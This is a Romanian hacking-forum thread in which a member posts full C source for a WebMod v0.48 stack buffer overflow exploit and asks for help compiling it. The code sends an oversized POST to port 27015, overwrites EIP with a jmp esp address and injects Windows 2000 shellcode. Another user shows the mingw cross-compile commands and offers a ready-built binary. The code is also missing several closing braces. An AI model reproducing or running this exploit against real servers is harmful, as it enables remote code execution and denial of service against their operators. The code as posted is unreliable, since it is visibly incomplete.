Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login


Nu sunteti logat.
Nou pe simpatie:
didiland pe Simpatie
20 ani
cauta Barbat
31 - 49 ani
Hacking and more... / S.O.S. / Compilare-need help Moderat de Shocker
Mesaj Pagini: 1
Membru nou

Inregistrat: acum 17 ani
Postari: 11
Ma ajuta cineva sa compilez , am incercat de multe ori dar primesc niste erori!
codul sursa:


 * WebMod Stack Buffer Overflow
 * WebMod v0.48 exploit PoC code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "ws2_32.lib")

local variables in connectHandle():

char *input;            4
char buf[8192+1];        8193
int i,j;            8
int connfd;            4
int myid;            4
threaddata_t *tdata;        4
httpquery_t query;        149036
char tmp[1025];            1025
int rcv;            4
char clbuf[11];            11

total:                158293
actual (due to padding):    158308

  breakdown of types:
    typedef struct s_var {        546
      char name[33];          33
      char value[513];          513
    } var_s;

    typedef struct s_httpquery {    149036
      char method[11];          11
      char clientip[16];          16
      char url[257];          257
      char *get;              4
      char *post;              4
      char *cookies;          4
      var_s vars[256];          139776
      char currentmapname[257];      257
      char sendcookies[8192+1];      8193
      char contenttype[257];      257
      char location[257];          257
    } httpquery_t;

//contains data to fill the Content-Length field with
char spambuf[20000];

//code to inject
//this particular code only works on Win2K SP4 (v5.0.4.0)
//and kernel32.dll v5.0.2195.6688
unsigned char code[] = {
                    // ; push string onto the stack without using 0x00
    0xB8, 0x59, 0x5A, 0x32, 0x11,    //mov     eax, 11325A59h ; "HI!\0" + 11111111h
    0x2D, 0x11, 0x11, 0x11, 0x11,    //sub     eax, 11111111h
    0x50,                //push    eax
    0x8B, 0xC4,            //mov     eax, esp     ; eax points to string

    0x33, 0xC9,            //xor     ecx, ecx     ; zero

                    // ; call MessageBox
    0x51,                //push    ecx         ; flags (0)
    0x50,                //push    eax         ; caption
    0x50,                //push    eax         ; text
    0x51,                //push    ecx         ; hwnd (0)
    0xB8, 0x98, 0x80, 0xE3, 0x77,    //mov     eax, 77E38098h ; &MessageBox
    0xFF, 0xD0,            //call    eax

                    // ; call GetCurrentProcessId
    0xB8, 0xF4, 0xB8, 0x4E, 0x7C,    //mov     eax, 7C4EB8F4h ; &GetCurrentProcessId
    0xFF, 0xD0,            //call    eax

    0x33, 0xC9,            //xor     ecx, ecx     ; zero

                    // ; call TerminateProcess
    0x51,                //push    ecx         ; return code (0)
    0x50,                //push    eax         ; process id
    0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov     eax, 7C518DC3h ; &TerminateProcess
    0xFF, 0xD0            //call    eax


//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
//set this to 0xFFFFFFFF to just cause a crash
unsigned int our_eip = 0x67E03C5B;

int main(int argc, char* argv[]) {
    WSADATA wsadata;
    int sock = 0;
    struct hostent* host = NULL;
    struct sockaddr_in saddr;

    //data to sent initially
    char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";

    //data to send after headers
    char endbuf[] = "\n\n";

    char* hostname = NULL;
    short hostport = 27015;

    int i;
    unsigned int sent = 0;

    //get host/port from command line
    if (argc < 2) {
        printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]);
        return 1;
    hostname = argv[1];
    if (argc >= 3) hostport = atoi(argv[2]);

    WSAStartup(MAKEWORD(1,1), &wsadata);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock <= 0) {
        printf("socket() error\n");
        return 1;

    host = gethostbyname(hostname);
    if (!host) {
        printf("gethostbyname() error\n");
        return 1;

    printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));

    memset(&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(hostport);
    memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);

    if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
        printf("connect() error\n");
        return 1;

    //initialize buffers
    memset(spambuf, 'a', sizeof(spambuf));

    //send initial POST request
    sent += send(sock, initbuf, sizeof(initbuf)-1, 0);

    //send 7 full spambufs to get 140000 bytes
    for (i = 0; i < 7; ++i)
        sent += send(sock, spambuf, sizeof(spambuf), 0);

    //send partial spambuf to fill remaining data
    //(18308, this goes right up to the EIP)
    sent += send(sock, spambuf, 18308, 0);

    //fill EIP
    sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);

    //insert code!
    sent += send(sock, (char*)code, sizeof(code), 0);

    //send newlines after content-length
    sent += send(sock, endbuf, sizeof(endbuf)-1, 0);

    printf("%u bytes sent...waiting...\n", sent);

    //wait for a while so the socket isn't closed on our end
    //before they receive all the data

    return 0;

pus acum 17 ani
Little Kevin

Din: Timisoara
Inregistrat: acum 17 ani
Postari: 74
poate zici ce compilator ai incercat ... si ce erori ai ... sau \\\\\\\"shal i use the force luke ?\\\\\\\"

NU pot decat sa presupun ca dadea o eroare ceva de genu : \\\"missing reference ... WStartup\\\" sau ceva de genu

uite aici dar cu mingw cross compiler ... daca tot nu-ti merge iti dau eu gata compilat ... uite solutia problemei :


xxs @ xskub:~/Desktop$ i586-mingw32msvc-gcc xs.c -lws2_32
xxs @ xskub:~/Desktop$ wine a.exe
Usage:  a.exe <hostname|ip> [port=27015]
xxs @ xskub:~/Desktop$

sper ca intelegi ... daca nu ... poate ca exploiturile nu sunt de tine

Modificat de SimionescuRadu (acum 17 ani)

pus acum 17 ani
Membru nou

Inregistrat: acum 17 ani
Postari: 11
si eu tot cu gcc am incercat insa ma prinsesem pe parcurs unde este eroarea :P
multam fain

pus acum 17 ani
Pagini: 1  

Mergi la